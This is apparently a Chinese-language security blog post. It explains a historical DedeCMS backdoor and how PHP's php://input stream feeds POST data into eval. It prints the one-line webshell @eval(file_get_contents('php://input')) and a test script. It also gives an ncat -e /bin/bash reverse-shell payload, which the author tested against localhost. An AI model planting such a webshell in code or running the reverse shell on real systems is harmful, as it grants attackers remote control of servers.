一、php://input一句话木马
在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)
@eval(file_get_contents('php://input'))
我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能。
$data=file_get_contents('php://input');
echo $data."
";
//@eval(file_get_contents('php://input'))
?>
发现php://input是用来接收post数据(这里有php://input的介绍)
注释掉phpinput.php的打印语句
使用firefox的hackbar提交上图显示的post data:
system('ncat -e /bin/bash localhost 1234');
测试了一下nc反弹shell的利用,成功